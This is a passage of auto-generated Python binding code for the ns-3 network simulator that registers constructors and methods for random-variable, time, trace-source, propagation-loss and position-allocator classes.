ns3::SameRoomPositionAllocator::AssignStreams(int64_t arg0) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'arg0')], is_virtual=True) ## building-position-allocator.h (module 'buildings'): ns3::Vector ns3::SameRoomPositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True) ## building-position-allocator.h (module 'buildings'): static ns3::TypeId ns3::SameRoomPositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) return def register_Ns3SequentialRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::SequentialRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::SequentialRandomVariable::SequentialRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetMin() const [member function] cls.add_method('GetMin', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetMax() const [member function] cls.add_method('GetMax', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): ns3::Ptr<ns3::RandomVariableStream> ns3::SequentialRandomVariable::GetIncrement() const [member function] cls.add_method('GetIncrement', 'ns3::Ptr< ns3::RandomVariableStream >', [], is_const=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::SequentialRandomVariable::GetConsecutive() const [member function] cls.add_method('GetConsecutive', 'uint32_t', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t 
ns3::SequentialRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void 
ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void 
ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter< ns3::Hash::Implementation > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3NetDeviceQueue_Ns3Empty_Ns3DefaultDeleter__lt__ns3NetDeviceQueue__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter< ns3::NetDeviceQueue > > const &', 'o')]) ## 
simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3QueueItem_Ns3Empty_Ns3DefaultDeleter__lt__ns3QueueItem__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >::SimpleRefCount(ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::QueueItem, ns3::empty, ns3::DefaultDeleter< ns3::QueueItem > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static 
void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3ThreeLogDistancePropagationLossModel_methods(root_module, cls): ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::ThreeLogDistancePropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## propagation-loss-model.h (module 'propagation'): ns3::ThreeLogDistancePropagationLossModel::ThreeLogDistancePropagationLossModel() [constructor] cls.add_constructor([]) ## propagation-loss-model.h (module 'propagation'): double ns3::ThreeLogDistancePropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::ThreeLogDistancePropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True) return def register_Ns3Time_methods(root_module, cls): cls.add_binary_numeric_operator('*', root_module['ns3::Time'], root_module['ns3::Time'], param('int64_t const &', u'right')) cls.add_binary_numeric_operator('+', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', u'right')) cls.add_binary_numeric_operator('-', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', u'right')) cls.add_binary_numeric_operator('/', root_module['ns3::Time'], root_module['ns3::Time'], param('int64_t const &', u'right')) cls.add_binary_comparison_operator('<') 
cls.add_binary_comparison_operator('>') cls.add_binary_comparison_operator('!=') cls.add_inplace_numeric_operator('+=', param('ns3::Time const &', u'right')) cls.add_inplace_numeric_operator('-=', param('ns3::Time const &', u'right')) cls.add_output_stream_operator() cls.add_binary_comparison_operator('<=') cls.add_binary_comparison_operator('==') cls.add_binary_comparison_operator('>=') ## nstime.h (module 'core'): ns3::Time::Time() [constructor] cls.add_constructor([]) ## nstime.h (module 'core'): ns3::Time::Time(ns3::Time const & o) [copy constructor] cls.add_constructor([param('ns3::Time const &', 'o')]) ## nstime.h (module 'core'): ns3::Time::Time(double v) [constructor] cls.add_constructor([param('double', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(int v) [constructor] cls.add_constructor([param('int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(long int v) [constructor] cls.add_constructor([param('long int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(long long int v) [constructor] cls.add_constructor([param('long long int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(unsigned int v) [constructor] cls.add_constructor([param('unsigned int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(long unsigned int v) [constructor] cls.add_constructor([param('long unsigned int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(long long unsigned int v) [constructor] cls.add_constructor([param('long long unsigned int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(ns3::int64x64_t const & v) [constructor] cls.add_constructor([param('ns3::int64x64_t const &', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(std::string const & s) [constructor] cls.add_constructor([param('std::string const &', 's')]) ## nstime.h (module 'core'): ns3::TimeWithUnit ns3::Time::As(ns3::Time::Unit const unit) const [member function] cls.add_method('As', 'ns3::TimeWithUnit', [param('ns3::Time::Unit const', 'unit')], is_const=True) ## nstime.h 
(module 'core'): int ns3::Time::Compare(ns3::Time const & o) const [member function] cls.add_method('Compare', 'int', [param('ns3::Time const &', 'o')], is_const=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & value) [member function] cls.add_method('From', 'ns3::Time', [param('ns3::int64x64_t const &', 'value')], is_static=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & value, ns3::Time::Unit unit) [member function] cls.add_method('From', 'ns3::Time', [param('ns3::int64x64_t const &', 'value'), param('ns3::Time::Unit', 'unit')], is_static=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::FromDouble(double value, ns3::Time::Unit unit) [member function] cls.add_method('FromDouble', 'ns3::Time', [param('double', 'value'), param('ns3::Time::Unit', 'unit')], is_static=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::FromInteger(uint64_t value, ns3::Time::Unit unit) [member function] cls.add_method('FromInteger', 'ns3::Time', [param('uint64_t', 'value'), param('ns3::Time::Unit', 'unit')], is_static=True) ## nstime.h (module 'core'): double ns3::Time::GetDays() const [member function] cls.add_method('GetDays', 'double', [], is_const=True) ## nstime.h (module 'core'): double ns3::Time::GetDouble() const [member function] cls.add_method('GetDouble', 'double', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetFemtoSeconds() const [member function] cls.add_method('GetFemtoSeconds', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): double ns3::Time::GetHours() const [member function] cls.add_method('GetHours', 'double', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetInteger() const [member function] cls.add_method('GetInteger', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetMicroSeconds() const [member function] cls.add_method('GetMicroSeconds', 'int64_t', [], is_const=True) ## 
nstime.h (module 'core'): int64_t ns3::Time::GetMilliSeconds() const [member function] cls.add_method('GetMilliSeconds', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): double ns3::Time::GetMinutes() const [member function] cls.add_method('GetMinutes', 'double', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetNanoSeconds() const [member function] cls.add_method('GetNanoSeconds', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetPicoSeconds() const [member function] cls.add_method('GetPicoSeconds', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): static ns3::Time::Unit ns3::Time::GetResolution() [member function] cls.add_method('GetResolution', 'ns3::Time::Unit', [], is_static=True) ## nstime.h (module 'core'): double ns3::Time::GetSeconds() const [member function] cls.add_method('GetSeconds', 'double', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetTimeStep() const [member function] cls.add_method('GetTimeStep', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): double ns3::Time::GetYears() const [member function] cls.add_method('GetYears', 'double', [], is_const=True) ## nstime.h (module 'core'): bool ns3::Time::IsNegative() const [member function] cls.add_method('IsNegative', 'bool', [], is_const=True) ## nstime.h (module 'core'): bool ns3::Time::IsPositive() const [member function] cls.add_method('IsPositive', 'bool', [], is_const=True) ## nstime.h (module 'core'): bool ns3::Time::IsStrictlyNegative() const [member function] cls.add_method('IsStrictlyNegative', 'bool', [], is_const=True) ## nstime.h (module 'core'): bool ns3::Time::IsStrictlyPositive() const [member function] cls.add_method('IsStrictlyPositive', 'bool', [], is_const=True) ## nstime.h (module 'core'): bool ns3::Time::IsZero() const [member function] cls.add_method('IsZero', 'bool', [], is_const=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::Max() [member function] 
cls.add_method('Max', 'ns3::Time', [], is_static=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::Min() [member function] cls.add_method('Min', 'ns3::Time', [], is_static=True) ## nstime.h (module 'core'): static void ns3::Time::SetResolution(ns3::Time::Unit resolution) [member function] cls.add_method('SetResolution', 'void', [param('ns3::Time::Unit', 'resolution')], is_static=True) ## nstime.h (module 'core'): static bool ns3::Time::StaticInit() [member function] cls.add_method('StaticInit', 'bool', [], is_static=True) ## nstime.h (module 'core'): ns3::int64x64_t ns3::Time::To(ns3::Time::Unit unit) const [member function] cls.add_method('To', 'ns3::int64x64_t', [param('ns3::Time::Unit', 'unit')], is_const=True) ## nstime.h (module 'core'): double ns3::Time::ToDouble(ns3::Time::Unit unit) const [member function] cls.add_method('ToDouble', 'double', [param('ns3::Time::Unit', 'unit')], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::ToInteger(ns3::Time::Unit unit) const [member function] cls.add_method('ToInteger', 'int64_t', [param('ns3::Time::Unit', 'unit')], is_const=True) return def register_Ns3TraceSourceAccessor_methods(root_module, cls): ## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor] cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')]) ## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor] cls.add_constructor([]) ## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function] cls.add_method('Connect', 'bool', [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')], is_pure_virtual=True, is_const=True, is_virtual=True) ## trace-source-accessor.h (module 'core'): bool 
ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function] cls.add_method('ConnectWithoutContext', 'bool', [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')], is_pure_virtual=True, is_const=True, is_virtual=True) ## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function] cls.add_method('Disconnect', 'bool', [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')], is_pure_virtual=True, is_const=True, is_virtual=True) ## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function] cls.add_method('DisconnectWithoutContext', 'bool', [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3TriangularRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::TriangularRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::TriangularRandomVariable::TriangularRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMean() const [member function] cls.add_method('GetMean', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMin() const [member function] cls.add_method('GetMin', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMax() const [member function] 
cls.add_method('GetMax', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetValue(double mean, double min, double max) [member function] cls.add_method('GetValue', 'double', [param('double', 'mean'), param('double', 'min'), param('double', 'max')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::TriangularRandomVariable::GetInteger(uint32_t mean, uint32_t min, uint32_t max) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mean'), param('uint32_t', 'min'), param('uint32_t', 'max')]) ## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::TriangularRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3TwoRayGroundPropagationLossModel_methods(root_module, cls): ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::TwoRayGroundPropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## propagation-loss-model.h (module 'propagation'): ns3::TwoRayGroundPropagationLossModel::TwoRayGroundPropagationLossModel() [constructor] cls.add_constructor([]) ## propagation-loss-model.h (module 'propagation'): void ns3::TwoRayGroundPropagationLossModel::SetFrequency(double frequency) [member function] cls.add_method('SetFrequency', 'void', [param('double', 'frequency')]) ## propagation-loss-model.h (module 'propagation'): void ns3::TwoRayGroundPropagationLossModel::SetSystemLoss(double systemLoss) [member function] cls.add_method('SetSystemLoss', 'void', [param('double', 'systemLoss')]) ## propagation-loss-model.h (module 'propagation'): void ns3::TwoRayGroundPropagationLossModel::SetMinDistance(double minDistance) [member function] 
cls.add_method('SetMinDistance', 'void', [param('double', 'minDistance')]) ## propagation-loss-model.h (module 'propagation'): double ns3::TwoRayGroundPropagationLossModel::GetMinDistance() const [member function] cls.add_method('GetMinDistance', 'double', [], is_const=True) ## propagation-loss-model.h (module 'propagation'): double ns3::TwoRayGroundPropagationLossModel::GetFrequency() const [member function] cls.add_method('GetFrequency', 'double', [], is_const=True) ## propagation-loss-model.h (module 'propagation'): double ns3::TwoRayGroundPropagationLossModel::GetSystemLoss() const [member function] cls.add_method('GetSystemLoss', 'double', [], is_const=True) ## propagation-loss-model.h (module 'propagation'): void ns3::TwoRayGroundPropagationLossModel::SetHeightAboveZ(double heightAboveZ) [member function] cls.add_method('SetHeightAboveZ', 'void', [param('double', 'heightAboveZ')]) ## propagation-loss-model.h (module 'propagation'): double ns3::TwoRayGroundPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::TwoRayGroundPropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True) return def register_Ns3UniformDiscPositionAllocator_methods(root_module, cls): ## position-allocator.h (module 'mobility'): ns3::UniformDiscPositionAllocator::UniformDiscPositionAllocator(ns3::UniformDiscPositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::UniformDiscPositionAllocator const &', 'arg0')]) ## position-allocator.h (module 'mobility'): 
ns3::UniformDiscPositionAllocator::UniformDiscPositionAllocator() [constructor] cls.add_constructor([]) ## position-allocator.h (module 'mobility'): int64_t ns3::UniformDiscPositionAllocator::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_virtual=True) ## position-allocator.h (module 'mobility'): ns3::Vector ns3::UniformDiscPositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True) ## position-allocator.h (module 'mobility'): static ns3::TypeId ns3::UniformDiscPositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## position-allocator.h (module 'mobility'): void ns3::UniformDiscPositionAllocator::SetRho(double rho) [member function] cls.add_method('SetRho', 'void', [param('double', 'rho')]) ## position-allocator.h (module 'mobility'): void ns3::UniformDiscPositionAllocator::SetX(double x) [member function] cls.add_method('SetX', 'void', [param('double', 'x')]) ## position-allocator.h (module 'mobility'): void ns3::UniformDiscPositionAllocator::SetY(double y) [member function] cls.add_method('SetY', 'void', [param('double', 'y')]) return def register_Ns3UniformRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::UniformRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::UniformRandomVariable::UniformRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetMin() const [member function] cls.add_method('GetMin', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetMax() const [member function] cls.add_method('GetMax', 'double', [], is_const=True) ## 
random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetValue(double min, double max) [member function] cls.add_method('GetValue', 'double', [param('double', 'min'), param('double', 'max')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::UniformRandomVariable::GetInteger(uint32_t min, uint32_t max) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'min'), param('uint32_t', 'max')]) ## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::UniformRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3WeibullRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::WeibullRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::WeibullRandomVariable::WeibullRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetScale() const [member function] cls.add_method('GetScale', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetShape() const [member function] cls.add_method('GetShape', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetBound() const [member function] cls.add_method('GetBound', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetValue(double scale, double shape, double bound) [member function] cls.add_method('GetValue', 'double', [param('double', 'scale'), param('double', 'shape'), param('double', 'bound')]) ## random-variable-stream.h (module 
'core'): uint32_t ns3::WeibullRandomVariable::GetInteger(uint32_t scale, uint32_t shape, uint32_t bound) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'scale'), param('uint32_t', 'shape'), param('uint32_t', 'bound')]) ## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::WeibullRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3ZetaRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ZetaRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ZetaRandomVariable::ZetaRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetAlpha() const [member function] cls.add_method('GetAlpha', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetValue(double alpha) [member function] cls.add_method('GetValue', 'double', [param('double', 'alpha')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZetaRandomVariable::GetInteger(uint32_t alpha) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'alpha')]) ## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZetaRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3ZipfRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId 
